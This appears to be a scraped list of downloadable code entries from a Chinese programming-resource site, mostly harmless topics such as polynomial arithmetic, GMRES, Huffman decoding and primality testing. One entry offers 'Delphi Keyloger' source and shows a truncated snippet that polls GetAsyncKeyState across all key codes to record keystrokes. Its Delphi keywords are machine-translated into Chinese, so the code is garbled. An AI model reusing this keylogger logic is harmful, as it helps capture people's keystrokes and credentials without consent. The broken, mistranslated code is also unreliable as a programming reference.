-
two polynomial multiplication
两个多项式加减乘运算-two polynomial multiplication
- 2022-02-20 11:27:52下载
- 积分:1
-
control keys commonly used procedures c language version Daquan
常用控键程序c语言版本大全-control keys commonly used procedures c language version Daquan
- 2022-08-20 19:52:10下载
- 积分:1
-
通过 Delphi Keyloger 代码
程序 Send(x: string);
开始
form1。Memo1.Lines.Add(x)
结束 ;
程序 TForm1.Timer1Timer(Sender: TObject);
//begin
//if GetAsyncKeyState(Ord("A")) =-32767 然后 send("A") ;
//if GetAsyncKeyState(Ord("B")) =-32767 然后 send("B") ;
var X,y:integer ;
f:char ;
str:string ;
开始
X: = 0 到 255 做
开始
- 2022-06-29 21:37:30下载
- 积分:1
-
keil数码管逐个亮
在keil编程软件上实现对数码管的检测,P1口接数码管,500ms的间隔时间逐个点亮。
- 2023-09-04 00:15:03下载
- 积分:1
-
c中常见的数值计算程序,在此拿出来是为了大家更好的理解,切磋!...
c中常见的数值计算程序,在此拿出来是为了大家更好的理解,切磋!-c common numerical procedures, in this show is for everyone to better understand, learn!
- 2022-08-02 15:08:55下载
- 积分:1
-
计算机算法与分析,包括书后习题答案,供参考了
计算机算法与分析,包括书后习题答案,供参考了-Computer algorithms and analysis, including the answer to the book Exercises for the reference to the
- 2022-01-30 10:53:27下载
- 积分:1
-
Huffman解码
这是一个用java解码哈夫曼树的项目。
- 2022-09-20 12:35:02下载
- 积分:1
-
解大规模线性方程组的预条件Gmres方法.系数矩阵可以非对称正定....
解大规模线性方程组的预条件Gmres方法.系数矩阵可以非对称正定.-Solution of large-scale linear equations of the preconditioned GMRES method. Coefficient matrix can be non-symmetric positive definite.
- 2022-05-15 20:02:59下载
- 积分:1
-
SolovayStrassen素性检测算法
Solovay-strassen概率判别法
利用欧拉判别条件
成立不一定为素数,n为合数时成立叫做基b的euler拟素数
基b的euler拟素数一定是基b的拟素数,逆不成立
请点击左侧文件开始预览 !预览只提供20%的代码片段,完整代码需下载后查看 加载中 侵权举报
- 2023-01-27 14:20:06下载
- 积分:1
-
uu编码&&解码
uu encode and decode
- 2023-08-07 01:25:03下载
- 积分:1